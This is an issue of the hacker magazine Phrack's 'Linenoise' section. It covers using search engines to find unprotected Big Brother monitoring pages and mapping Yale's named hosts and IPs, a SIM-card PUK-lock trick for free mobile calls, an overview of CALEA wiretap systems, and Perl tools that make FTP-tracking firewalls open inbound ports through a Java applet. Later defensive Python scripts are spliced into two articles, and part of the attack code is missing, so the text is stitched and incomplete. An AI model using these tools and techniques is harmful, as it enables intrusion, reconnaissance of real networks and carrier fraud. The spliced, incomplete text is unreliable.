==Phrack Inc.==

                 Volume 0x0b, Issue 0x3c, Phile #0x03 of 0x10

|=-----------------------=[ L I N E N O I S E ]=-------------------------=|
|=-----------------------------------------------------------------------=|
|=-------------------------=[ Phrack Staff ]=----------------------------=|


--[ Contents

  1 - The Dark Side of NTFS
  2 - Watching Big Brother
  3 - Free mobile calls
  4 - Lawfully Authorized Electronic Surveillance [LAES]
  5 - Java Tears down the Firewall


--[ 1 - The Dark Side of NTFS

Ok, this didn't fit anywhere else so we put it here:

  http://patriot.net/~carvdawg/docs/dark_side.html


--[ 2 - Watching Big Brother

by da_knight

Have you ever wanted to be the one doing the watching? If you are a system
administrator of UNIX / Linux servers, then you may be aware of a product
called Big Brother, which can be downloaded from 'http://bb4.com/'. This
article is by no means technical, simply because it doesn't need to be. It
is divided into two sections, so bear with me for the briefing on Big
Brother (BB).

BB is a program that will monitor various computer equipment; things it can
monitor are connectivity, cpu utilization, disk usage, ftp status, http
status, pop3 status, etc. As you might imagine, this information is very
important to an organization. BB is your standard client / server setup.
The server software can run on various flavors of UNIX, Linux and NT. The
client software is available for UNIX, Linux, NT, Mac, Novell, AS/400, and
VAXEN; some client software is provided by 3rd-party vendors and not
supported by BB4 Technologies. The cool thing is that all of this
information is viewed on a web page. So, if you have multiple servers that
you have to maintain, with this product you would be able to go to one web
page and quickly get a status of all of those servers - pretty handy. When
everything is fine your status is "green"; major problems are indicated by
"red".
Example: The connectivity (conn) status is done by pinging the equipment in
question; if the ping fails then it appears as a red zit on the web page.
When tests such as this fail, BB can be configured to automatically page
the administrator. Here is a quick run down of the statuses, listed in
order of severity:

  red    - Trouble; you've got problems.
  purple - No report; the client hasn't responded in the last 30 minutes.
  yellow - Attention; a threshold has been crossed.
  green  - OK; take the day off.
  clear  - Unavailable; the test has been turned off.
  blue   - Disabled; notification for this test has been turned off.

The status is also reflected in the title of the web page, so it only
takes one red zit to cause the web page title to start with "red:Big
Brother"; we're going to get into this in a minute.

A common thing for administrators to do is to monitor their most important
systems with this product, as well as the most important aspects of each
system. If you have a web server, you would want to monitor the http and
conn statuses just to make sure people are still able to connect to the
server. Other tests I have seen are to check Oracle, or to list all
connected users. Hell, they even have a way to add weather reports. The
point is, it's pretty limitless what can be monitored; it just depends on
what you deem important.

Now that you have a little bit of an understanding of what BB can do, I
want to quote two things from the BB4 Technologies (BB4) FAQ - Section 5:
Security Considerations (http://bb4.com/bb/help/bb-faq.html#5.0).
Everything in that section of the FAQ should be considered, but we'll
focus on these two.

  "BB does not need to run as root. We suggest creating a user 'bb' and
   running bb as that user."

  "We recommend password-protecting the Big Brother web pages"

So, you ask yourself, why are these things important to me?
Well, one, you know that administrators who run this software probably have
it set up using the user 'bb', and that they may also be running it with
root level access. This gives you a valid user account on a system, and
this account probably wouldn't be used by a human very often, so the
password could be something simple. But that's not the point of this
article. The second thing is that BB4 realizes the information on these
web pages is extremely important and they recommend password-protecting
them. Following this logic you then say: these are web pages, so it's
running on a web server, and if they're not password-protected and the
server is visible to the WWW, then... that's right, search engines will
find these pages and serve them up when you know what to look for.

What are you waiting for? Go to 'http://www.google.com' and search for
"green:Big Brother" (include the quotes; it makes it more refined). You
will get about 16,200 matches. Now that doesn't mean that those are all
unique, because it will have numerous pages from the same site, but you
get the point. I would estimate that there are over 200 sites that can be
viewed this way. Remember to search for all the other statuses too; just
change the name of the color. One more thing, I chose Google for a reason.
Some of these sites no longer run the BB product, but Google has a nice
ability to view cached pages, so you can still glean information from
them.

After you scroll through the list of sites you will realize that the
majority of them are either small ISPs or colleges. I'm going to pick on a
college, an Ivy League one, no less. I can tell you from looking at this
particular BB site that the BB server is running on a computer called
'artemis.cs.yale.edu' and the IP address is '128.36.232.57'. Also the
computer 'rhino.zoo.cs.yale.edu' is having some serious issues. How did I
find the IP address?
Simple; if you click on the "green" or whatever color button under the
"conn" column, you will see a web page that has information similar to
this:

  ---------------------------------------------------------
  rhino.zoo.cs.yale.edu - conn
  ---------------------------------------------------------
  green Sun Jun 30 01:33:15 EDT 2002 Connection OK

  PING 128.36.232.12 (128.36.232.12) from 128.36.232.57 : 56(84) bytes of data.
  64 bytes from 128.36.232.12: icmp_seq=0 ttl=255 time=379 usec

  --- 128.36.232.12 ping statistics ---
  1 packets transmitted, 1 packets received, 0% packet loss
  round-trip min/avg/max/mdev = 0.379/0.379/0.379/0.000 ms
  ---------------------------------------------------------

Right there you know that the ping command was trying to ping
'128.36.232.12', in this case 'rhino.zoo.cs.yale.edu', and that it came
from '128.36.232.57' or 'artemis.cs.yale.edu'. Let's see what else we can
find out. I can see that almost all of their servers run Tripwire, so they
are UNIX systems, and you probably would have a hard time creating a
backdoor account on these systems. On another page, we get to see the
users who are currently logged in. Currently we have 33 users logged in,
and seeing as it's 1:33 AM, I think some people left their computers
logged in.

I want to get more information about Yale's servers, so let's go back to
Google and look for another page from Yale, but this time look for
'zelda.cs.yale.edu'. Now we can get some good information. When this site
is displayed you will see quite a few servers listed, as well as several
departments.
If you want to know what software 'plucky.cs.yale.edu' is using to run its
HTTP services, just click on the 'green' button:

  ----------------------------------------------------
  plucky.cs.yale.edu - http
  ----------------------------------------------------
  green Sun Jun 30 01:45:21 EDT 2002 http://plucky.cs.yale.edu - Server OK

  HTTP/1.1 200 OK
  Server: Microsoft-IIS/4.0
  Content-Location: http://plucky.cs.yale.edu/index.html
  Date: Sun, 30 Jun 2002 05:45:21 GMT
  Content-Type: text/html
  Accept-Ranges: bytes
  Last-Modified: Tue, 12 Jan 1999 20:49:40 GMT
  ETag: "54b4ec126d3ebe1:4051"
  Content-Length: 2226

  Seconds: 0.01
  ----------------------------------------------------

What the hell? They're actually running IIS 4.0? Don't they know how
insecure that is? But I digress. From that information you know that the
server is some version of Windows NT and it has IIS 4.0 running; that
could be handy.

Zelda is also showing that they monitor printers. Now that can be fun;
what if the message "I think therefore I hack!" is sent to the printer
'philo-printer.philosophy.yale.edu'? And in case you're wondering, the
printer is an 'HP LaserJet 4050 Series'; I just had to click on the
button under the "printer" column to find that out.

Elsewhere on this same site, I find that several servers are running
TELNET, POP3, Oracle, FTP, and IMAP. Most of these services will gladly
tell you what version of the software they are running. Oracle, for
instance, is even nice enough to show you all of the connected users. How
can you thank them enough for this valuable information? Also, it seems
only the geologists at Yale feel they have data that is of great
importance. I wasn't able to view what they monitor because of access
permissions on their web site, but I do know that they are running their
web server on Apache version 1.3.26.

As you can see, I would be able to gather an enormous amount of vital
infrastructure data in a few minutes. Plus, I didn't break any laws.
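The FAQ quoted above says the fix is to password-protect the BB pages; the
following is an added self-audit script (not part of this article and not
BB4's code) that an administrator can point at their own BB web root to
confirm the pages answer with a 401/403 instead of a readable status page.
The title pattern it keys on is the same "<color>:Big Brother" title the
search above relies on. The page names bb.html and bb2.html are assumed to
be the default BB layout, and the two HTML samples are constructed so the
classifier can be exercised offline.

```python
"""Self-audit: are my Big Brother status pages readable without a login?"""

import re
import sys
import urllib.error
import urllib.request

# A BB status page titles itself "<color>:Big Brother"; that title is what
# a search engine indexes and what the "green:Big Brother" query keys on.
BB_TITLE_RE = re.compile(
    r"<title>\s*(red|purple|yellow|green|clear|blue):Big Brother",
    re.IGNORECASE)


def classify(status, body):
    """Return 'protected', 'exposed' or 'other' for one fetched page.

    401/403 means the web server asked for credentials -> protected.
    200 with a BB title means anyone, search engines included, can read it.
    """
    if status in (401, 403):
        return "protected"
    if status == 200 and BB_TITLE_RE.search(body):
        return "exposed"
    return "other"


def fetch(url, timeout=10):
    """Fetch url and return (status, body); HTTP errors are returned, not
    raised, so that 401/403 answers reach classify()."""
    req = urllib.request.Request(url, headers={"User-Agent": "bb-self-audit"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode("utf-8", "replace")


def audit(base_url):
    """Classify the main BB pages under base_url (assumed default file names;
    adjust for your install). Returns {url: classification}."""
    base = base_url.rstrip("/")
    pages = [base + "/bb.html", base + "/bb2.html"]
    return {u: classify(*fetch(u)) for u in pages}


# Constructed sample responses, standing in for a live server.
SAMPLE_OPEN = "<html><head><title>green:Big Brother - Status @ Sun Jun 30</title>"
SAMPLE_AUTH = "<html><body><h1>401 Authorization Required</h1></body></html>"

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for url, verdict in audit(sys.argv[1]).items():
            print(f"{verdict:10} {url}")
    else:
        print(classify(200, SAMPLE_OPEN), classify(401, SAMPLE_AUTH))
```

Run it as `python3 bb_audit.py http://bbserver.example/bb/` from outside
your own network; any page reported as "exposed" is one a search engine can
index and serve from its cache long after you fix it.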
These web pages are posted in a manner that the entire world can view
them. It might take someone 10 minutes or more to find out a few facts
about 1 particular system, but in that amount of time I found numerous
facts about over 40 systems at the same organization. Thanks Big Brother!

I feel it should be mentioned that the information found on these web
pages is information that most organizations don't even let employees
outside of the IT department see. I guess I should feel special, since
Yale must feel that I'm not a security risk; otherwise they would have
made me authenticate to their web sites.

Imagine this: an ISP that lists all of its routers, complete with IPs and
model information. If you had that, you could possibly rely on
vulnerabilities in SNMP discovered earlier this year, or better yet, rely
on the default accounts / passwords set up on these types of devices. I
only bring this up because I know I did come across an ISP that did list
routers, and the majority of the sites returned by Google seemed to be
smaller ISPs. Also, about searching on Google, I would recommend searching
for "red:Big Brother", because these pages will always give you more
information than when the system is running perfectly.

Finally, I didn't write this article to condone breaking into systems and
providing a means to that end. I wrote this because security is extremely
important; with the information that is found because of this one product
your environment could be compromised. If you are a system administrator
for a site that shows up on Google you may want to secure your BB web
pages, because by the time you read this the world is going to know your
infrastructure.


--[ 3 - Free Mobile Calls

by eurinomo

This bug can be utilized to make FREE CALLS, FREE SMS, and even FREE WAP.
First you have to see if your mobile network has the bug.
Just call the service's free number (so you don't waste money) and tell
them that your card is locked: that you forgot your phone in your little
sister's room and your mobile says "Sim Card is lock" or something, and
say that maybe your sister got the PUK wrong because the phone was powered
off and now it's on. Then the guy should say that you have to go to one of
their Mobile Shops and explain the problem, and they will give you another
card with the same number and money as the old one. Ask them how much it
will cost and the guy should say it's for free! :-)

Now the material that you'll need:

  - A mobile phone that is not a Nokia (it's better to be yours and not
    unlocked)
  - And a Nokia (can be an unlocked one, or stolen or borrowed. Do as you
    wish!)

How to do it:

  Mobile1 = Not Nokia
  Mobile2 = Nokia

Put the card in Mobile1 and enter your PIN. When it has booted up, enter
this code 3 times:

  **04*00000000*00000000*00000000#

or try

  **05*00000000*00000000*00000000#

Check the manual and search for the code to change the PUK if the above
examples don't work. Or send an email to Motorola and say that you have a
Motorola phone and that you want to change the PUK and you know that there
is a code to change it (the code isn't illegal and it's also specified in
the manual). If the code isn't the one that I have told you, it's one
nearby. If you have a Motorola Flare, when you enter **04* or **05* it
will say "Enter the old PUK" or something like that automatically and then
ask for the new PUK code 2 times. But the important thing is to lock your
card; I think you can also do it if you get the PIN wrong 3 times and then
enter a wrong PUK, and voila, it's locked! What I was saying about the
code was tested, but you can try this last one too; use it at your own
risk.

Now go to the Mobile Shop and say what happened (that your little sister
or a daughter of a friend of your mother or something like that...) and
then they will duplicate the card and give you the new one and the old
one. At least they normally give you both. Now the easy part.
Put the old card in the Nokia and boot it up, and you'll see that it's not
locked!!! And if you put it in another phone that is not a Nokia, it says
that it's locked; the bug is more of a Nokia bug than a network bug. Now
send an SMS with the old card and see if money was deducted. Then see if
it was deducted from the new card; if not, then it's because the network
has the bug and you can spend the money on the old card as you wish, but
you only have 2 weeks or so before they cut it off the network and it's
completely locked. But the new card still has the same money and you can
do it again and again; I think they wouldn't catch you.

This was tested on the Portugal Vodafone mobile phone network.


--[ 4 - Introduction to Lawfully Authorized Electronic Surveillance (LAES)

by Mystic

In 1994 Congress adopted the Communications Assistance for Law Enforcement
Act (CALEA). Its intent was to preserve but not expand the wiretapping
capabilities of law enforcement agencies by requiring telecommunication
providers to utilize systems that would allow government agencies a basic
level of access for the purpose of surveillance. The act however does not
only preserve the already existing capabilities of law enforcement to tap
communications; it enhances them, allowing the government to collect
information about wireless callers, tap wireless content, text messaging,
and packet communications. The standard that resulted from this
legislation is called Lawfully Authorized Electronic Surveillance, or
LAES.

A Telecommunications Service Provider (TSP) that is CALEA compliant
provides Law Enforcement Agencies (LEAs) with the means to access the
following services and information:

  1. Non-call associated: Information about the intercept subjects that is
     not necessarily related to a call.
  2. Call associated: call-identifying information about calls involving
     the intercept subjects.
  3. Call associated and Non-call associated signaling information:
     Signaling information initiated by the subject or the network.
  4. Content surveillance: the ability to monitor the subjects'
     communications.

This process is called the intercept function. The intercept function is
made up of 5 separate functions: access, delivery, collection, service
provider administration, and law enforcement administration.


----[ 4.1 The Access Function (AF)

The AF consists of one or more Intercept Access Points (IAPs) that isolate
the subject's communications or call-identifying information
unobtrusively. There are several different IAPs that can be utilized in
the intercept function. I have separated them into Call Associated and
Non-call Associated information IAPs and Content Surveillance IAPs:

Call Associated and Non-call Associated information IAPs
--------------------------------------------------------

- Serving System IAP (SSIAP): gives non-call associated information.

- Call-Identifying Information IAP (IDIAP): gives call associated
  information in the form of the following call events for basic circuit
  calls:

    Answer             - A party has answered a call attempt
    Change             - The identity or identities of a call has changed
    Origination        - The system has routed a call dialed by the
                         subject or the system has translated a number
                         for the subject
    Redirection        - A call has been redirected (e.g., forwarded,
                         diverted, or deflected)
    Release            - The facilities for the entire call have been
                         released
    TerminationAttempt - A call attempt to an intercept subject has been
                         detected

- Intercept Subject Signaling IAP (ISSIAP): provides access to
  subject-initiated dialing and signaling information. This includes
  whether the intercept subject uses call forwarding, call waiting, call
  hold, or three-way calling. It also gives the LEA the ability to receive
  the digits dialed by the subject.

- Network Signaling IAP (NSIAP): allows the LEA to be informed about
  network messages that are sent to the intercept subject.
  These messages include busy, reorder, ringing, alerting, message waiting
  tone or visual indication, call waiting, calling or redirection
  name/number information, and displayed text.

Content Surveillance IAPs
-------------------------

The following are content surveillance IAPs that transmit content using a
CCC or CDC. An interesting note about content surveillance is that TSPs
are not responsible for decrypting information that is encrypted by the
intercept subject unless the data was encrypted by the TSP and the TSP
has the means to decrypt it.

- Circuit IAP (CIAP): accesses call content of circuit-mode
  communications.

- Conference Circuit IAP (CCIAP): provides access to the content of
  subject-initiated Conference Call services such as three-way calling
  and multi-way calling.

- Packet Data IAP (PDIAP): provides access to data packets sent or
  received by the intercept subject. These include the following
  services:

    ISDN user-to-user signaling
    ISDN D-channel X.25 packet services
    Short Message Services (SMS) for cellular and Personal Communication
      Services
    Wireless packet-mode data services (e.g., Cellular Digital Packet
      Data (CDPD), CDMA, TDMA, PCS1900, or GSM-based packet-mode data
      services)
    X.25 services
    TCP/IP services
    Paging (one-way or two-way)
    Packet-mode data services using traffic channels


----[ 4.2 The Delivery Function (DF)

The DF is responsible for delivering intercepted communications to one or
more Collection Functions. This is done over two distinct types of
channels: Call Content Channels (CCCs) and Call Data Channels (CDCs). The
CCCs are generally used to transport call content such as voice or data
communications. CCCs are either "combined", meaning that they carry
transmit and receive paths on the same channel, or "separated", meaning
that transmit and receive paths are carried on separate channels. The
CDCs are generally used to transport the messages that report
call-identifying information, as well as content that is text based, such
as Short Message Service (SMS).
Information over CDCs is transmitted using a protocol called the Lawfully
Authorized Electronic Surveillance Protocol (LAESP).


----[ 4.3 The Collection Function (CF)

The CF is responsible for collecting and analyzing intercepted
communications and call-identifying information, and is the
responsibility of the LEA.


----[ 4.4 The Service Provider Administration Function (SPAF)

The SPAF is responsible for controlling the TSP's Access and Delivery
Functions.


----[ 4.5 The Law Enforcement Administration Function (LEAF)

The LEAF is responsible for controlling the LEA's Collection Function and
is the responsibility of the LEA.

Now that I've introduced you to LAES, let's look at an implementation of
it that is on the market right now and is being used by some TSPs:

Overview of the CALEAserver:

The CALEAserver is manufactured by SS8 Networks. It is a collection and
delivery system for call information and content. It allows existing
networks to become completely CALEA compliant. It allows an LEA to monitor
wireless and wireline communications and gather information about the
calls remotely. The CALEAserver interfaces with the network through
Signaling System 7 (SS7), which is an extension of the Public Switched
Telephone Network (PSTN).

The CALEAserver is composed of three major layers: the Hardware Platform
Layer, the Network Platform Layer and the Application Software Layer.

The Hardware Platform Layer consists of the Switching Matrix and the
Computing Platform. The Switching Matrix is an industry standard
programmable switch. It contains T1 cards for voice transmission and cross
connect between switches, DSP cards for the conference circuits required
for the intercept and for DTMF reception/generation, and CPU cards for
management of the switch. The Computing Platform is a simplex, rack
mounted, UNIX based machine. It is used to run the CALEAserver application
software that provides Delivery Function capabilities and controls the
Switching Matrix.
The Network Platform Layer provides SS7 capability, as well as call
processing APIs for the Application Software Layer. It also controls the
Switching Matrix.

The Application Software Layer is where the Delivery and Service Provider
Administration functions are carried out. It isolates the interfaces
towards the Access and Collection Functions from the main delivery
functionality, allowing for multiple Access and Collection Functions
through Interface Modules that can be added or modified without impacting
the existing functionality.

System Capacity:

  Configurable for up to:
    1000 Collection functions
    128 Access Function Interfaces
    32 SS7 links
    512 simultaneous call content intercepts on a single call basis
    64 T1 voice facilities

Operating Environment:

  NEBS compliant, -48 volt, 19" rack mounted equipment
  Next-generation UltraSPARC processor
  66-MHz PCIbus
  Solaris UNIX operating system
  9Gbyte, 40-MB/sec SCSI disks
  512 Mbytes RAM standard
  Ethernet/Fast Ethernet, 10-BaseT and 100-BaseT
  Two RS-232C/RS-423 serial ports
  Programmable, scalable switch with up to 4000 port time slot interchange

Features:

  Built in test tools for remote testing
  Full SS7 management system
  Alarm reporting and Error logging
  Automatic software fault recovery
  Automatic or manual disk backup
  SNMP support
  Optional support for X.25 and other collection function interfaces
  ITU standard MML and Java based GUI support
  Support of both circuit-switched and packet-switched networks
  Optional support for other access function interfaces as required for
  CALEA compliance, including:
    * HLR (Home Location Register)
    * VMS (Voice Mail System)
    * SMS (Short Message System)
    * CDPD wireless data
    * Authentication Center
    * Remote access provisioning

This concludes the introduction to LAES. This being only an introduction,
I've left out a lot of details like protocol information. However, if you
are interested in learning more about LAES I would suggest reading the
TIA standard J-STD-025A.
I hope you learned a little bit more about the surveillance capabilities
of LEAs. If you have any questions feel free to contact me. Email address:
see above.


--[ 5 - Java tears down the Firewall

Recently there has been much hype about various insecurities in firewalls
which support tracking of FTP sessions. They could be tricked into
thinking someone was opening an FTP session by using a second TCP stack,
for example. I would point you to CERT-URL for complete discussion. There
have been other techniques discussed, such as embedding some evil tags in
HTML files which make the browser open connections a firewall could
interpret as an FTP session.

Consider the following net:

  [ Company ] ---- [ firewall ] --- [ some router ] --- [ WEB ]

Someone from 'Company' is browsing the web and has to pass his packets
across some router that is not under the control of Company but of the
attacker. Very common scenario, no? A few tools have been compiled to
circumvent such a setup. I would even say, as soon as you enable FTP
tracking you are lost. More than one way ends in Rome. Let me explain the
small tools in short.

  html-redirect: Attacker installs this on some router and sets up a
                 redirect rule to port 8888.

  class-inject:  Attacker starts this with eftepe.class. html-redirect
                 will redirect the HTML requests to this mini-httpd. It
                 forces the browser inside Company, which is shielded by
                 the firewall, to load the Java applet. This applet
                 simulates an active FTP session to some router, and it
                 is allowed to because the security manager sees some
                 router as the origin of eftepe.class. The firewall will
                 then open port 7350 inbound so you can connect from
                 some router:20 to Company:7350.

  ftpd:          Attacker must run this on some router in order to
                 simulate the FTP session.

  createclass:   Script to create the correct Java code which uses the
                 appropriate IP (of some router) and port (on Company).

The Attacker could also sit on WEB (i.e. phrack.org :) and embed evil Java
applets. So take care, because X runs on port 6000. :-)
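The tools above work because a stateful firewall's FTP helper creates a
RELATED expectation purely from a "PORT h1,h2,h3,h4,p1,p2" line it reads on
a port-21 connection. The following is an added example (not code from the
article's tools or from any firewall) that models that decoding and the
checks a stricter helper applies: the address in PORT must equal the
control connection's source, the port must be unprivileged, and a
never-expect list covers ports such as X11's 6000, which the text singles
out. The control-channel lines are constructed; the 10.0.0.0/8 addresses are
placeholders. Note that the first PORT line passes even the strict checks,
which is exactly the article's point: the applet runs on the inside host,
so the address it announces is its own.

```python
"""Model an FTP conntrack helper's handling of PORT, with strict checks."""

import re

PORT_RE = re.compile(r"^PORT\s+(\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\s*$")

# Ports a helper should never open on the client side whatever the control
# channel says. 6000-6063 is X11, the service the article warns about.
NEVER_EXPECT = set(range(6000, 6064))


def parse_port(line):
    """Decode 'PORT h1,h2,h3,h4,p1,p2' into (ip, port); None if malformed."""
    m = PORT_RE.match(line.strip())
    if not m:
        return None
    h1, h2, h3, h4, p1, p2 = (int(x) for x in m.groups())
    if max(h1, h2, h3, h4, p1, p2) > 255:
        return None
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2


def evaluate_port(client_ip, line, loose=False):
    """Decide whether a helper should create a RELATED expectation.

    client_ip: source address of the control connection (the inside host).
    loose:     emulate a helper that accepts any address in PORT; a strict
               helper requires it to equal client_ip.
    Returns (allow, reason, (ip, port) or None).
    """
    parsed = parse_port(line)
    if parsed is None:
        return False, "malformed PORT", None
    ip, port = parsed
    if not loose and ip != client_ip:
        return False, "address in PORT differs from control-connection source", parsed
    if port < 1024:
        return False, "privileged data port", parsed
    if port in NEVER_EXPECT:
        return False, "port on never-expect list", parsed
    return True, "expectation created", parsed


def scan_control_stream(client_ip, lines, loose=False):
    """Run evaluate_port over client->server lines; return one decision per
    PORT line, in order. Usable log-side as a detector: every denial is a
    control channel asking the firewall to open something odd."""
    return [evaluate_port(client_ip, l, loose)
            for l in lines if l.upper().startswith("PORT")]


# Constructed session: inside host 10.0.0.5 talking to port 21 on a router
# it should not trust. 28*256+182 = 7350, the port the article's applet
# opens; 23*256+112 = 6000 is X11.
SAMPLE = [
    "USER anonymous",
    "PASS x@y",
    "PORT 10,0,0,5,28,182",   # 10.0.0.5:7350 - own address, high port
    "PORT 10,0,0,5,23,112",   # 10.0.0.5:6000 - X11, never expect
    "PORT 10,0,0,9,28,182",   # another inside host - third-party PORT
    "PORT 10,0,0,5,0,80",     # privileged port 80
]

if __name__ == "__main__":
    for allow, reason, target in scan_control_stream("10.0.0.5", SAMPLE):
        print("ALLOW" if allow else "DENY ", target, reason)
```

Because the strict checks still let the applet's own-address PORT through,
the address check only stops third-party PORT abuse; the remaining defences
are the ones the article implies: do not load the FTP helper at all, or
restrict which hosts may reach port 21 so the helper never sees a control
channel to an untrusted router, and log the SYNs it would otherwise let in.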
It is really that simple, and it's not even worth its own article; that's
why you find it here as an add-on.


#!/usr/bin/perl -w
#
# class-inject: mini HTTP server that hands the browser a page embedding
# the applet, and serves the class file itself when asked for it.
#
use IO::Socket;

sub usage {
    print "Usage: $0 <classfile>\n\n";
    exit;
}

my $classfile = shift || usage();
my $class;
my $classlen  = (stat($classfile))[7];

open I, "<$classfile" or die $!;
read I, $class, $classlen;
close I;

my $sock = IO::Socket::INET->new(Listen    => 10,
                                 LocalPort => 8080,
                                 Reuse     => 1) or die $!;
my $conn;

for (;;) {
    next unless $conn = $sock->accept();
    if (fork() > 0) {            # parent: hand the connection to the child
        $conn->close();
        next;
    }
    my $request = <$conn>;
    if ($request =~ /$classfile/) {
        # the browser is fetching the class file itself
        my $classcontent = "HTTP/1.0 200 OK\r\n".
                           "Server: Apache/1.3.6 (Unix)\r\n".
                           "Content-Length: $classlen\r\n".
                           "Content-Type: application/octet-stream\r\n\r\n".
                           $class;
        print $conn $classcontent;
        print "Injected to ", $conn->peerhost(), "\n";
    } else {
        # any other request gets a page that embeds the applet. The markup
        # was stripped from this copy of the article; the applet tag below
        # is reconstructed from the class name used here.
        print $conn "<HTML>".
                    "<APPLET CODE=\"$classfile\" WIDTH=1 HEIGHT=1></APPLET></HTML>".
                    "\r\n\r\n";
    }
    $conn->close();
    exit(0);
}


#!/usr/bin/perl -w
#
# createclass: writes eftepe.java with the IP of "some router" and the
# port to open on the Company side baked in, and puts the Java tools on
# the PATH.
#
$ENV{"PATH"} = $ENV{"PATH"}.":/usr/lib/java/bin";

print "Creating appropriate Java class-file for opening port > 1023\n";
print "Enter IP to connect to on port 21 (e.g. '127.0.0.1'):";
my $ip = <STDIN>;
chop($ip);
print "Enter port to open:";
my $port = <STDIN>;
chop($port);

# the PORT command carries the port as two bytes, high then low
my $p1 = int $port/256;
my $p2 = $port%256;

open O, ">eftepe.java" or die $!;
print O <<EOF;
# [The eftepe.java source inside the here-document, and the rest of this
#  script, are missing from this copy of the article.]


#!/usr/bin/perl -w
#
# ftpd: fake FTP server on "some router". It answers whatever the applet
# sends with success codes, then holds the connection open for a while so
# the firewall keeps its RELATED expectation around.
#
use IO::Socket;

my $sock = IO::Socket::INET->new(Listen    => 10,
                                 LocalPort => 21,
                                 Reuse     => 1) or die $!;
my $conn;

for (;;) {
    next unless $conn = $sock->accept();
    if (fork() > 0) {
        $conn->close();
        next;
    }
    print $conn "220 ready\r\n";
    <$conn>;                                  # USER
    print $conn "331 Password please\r\n";
    <$conn>;                                  # PASS
    print $conn "230 Login successful\r\n";
    <$conn>;                                  # PORT
    print $conn "200 PORT command successful.\r\n";
    sleep(36);
    $conn->close();
    exit 0;
}


#!/usr/bin/perl -w
#
# html-redirect: Simple HTTP Redirector. Run on "some router", with the
# web traffic passing through diverted to this port:
#
#   iptables -A PREROUTING -t nat -p tcp --dport 80 -j REDIRECT --to-port 8888
#
use IO::Socket;

sub usage {
    print "Usage: $0 <IP|Host>\n".
          "\t\tIP|Host -- IP or Host to redirect HTML requests to\n\n";
    exit;
}

my $r = shift || usage();
my $redir = "HTTP/1.0 301 Moved Permanently\r\n".
            "Location: http://$r:8080\r\n\r\n";

my $sock = IO::Socket::INET->new(Listen    => 10,
                                 LocalPort => 8888,
                                 Reuse     => 1) or die $!;
my $conn;

for (;;) {
    next unless $conn = $sock->accept();
    if (fork() > 0) {
        $conn->close();
        next;
    }
    my $request = <$conn>;      # read and ignore the request line
    print $conn "$redir";
    $conn->close();
    exit(0);
}


#!/usr/bin/perl -w
#
# Connect test: from "some router", connect with source port 20 to the
# port the applet had the firewall open on the Company host (needs root,
# since port 20 is privileged).
#
use IO::Socket;

sub usage {
    print "Usage: $0 <host> <port>\r\n";
    exit 0;
}

my $a = shift || usage();
my $b = shift || usage();

my $conn = IO::Socket::INET->new(PeerAddr  => $a,
                                 PeerPort  => $b,
                                 LocalPort => 20,
                                 Type      => SOCK_STREAM,
                                 Proto     => 'tcp') or die $!;
print $conn "GOTCHA\r\n";
$conn->close();


#!/bin/sh
#
# sample FTP session tracked firewall for 2.4 linux kernels
#
modprobe ip_conntrack_ftp
iptables -F

# outbound FTP control channel and its replies
iptables -A INPUT  -p tcp --sport 21 -m state --state ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --dport 21 -m state --state NEW,ESTABLISHED -j ACCEPT

# active-mode data channel: RELATED is what the helper's expectation grants
iptables -A INPUT  -p tcp --sport 20 -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -p tcp --dport 20 -m state --state ESTABLISHED -j ACCEPT

#iptables -A INPUT -p tcp --syn -j LOG
iptables -A INPUT -p tcp --syn -j DROP


|=[ EOF ]=---------------------------------------------------------------=|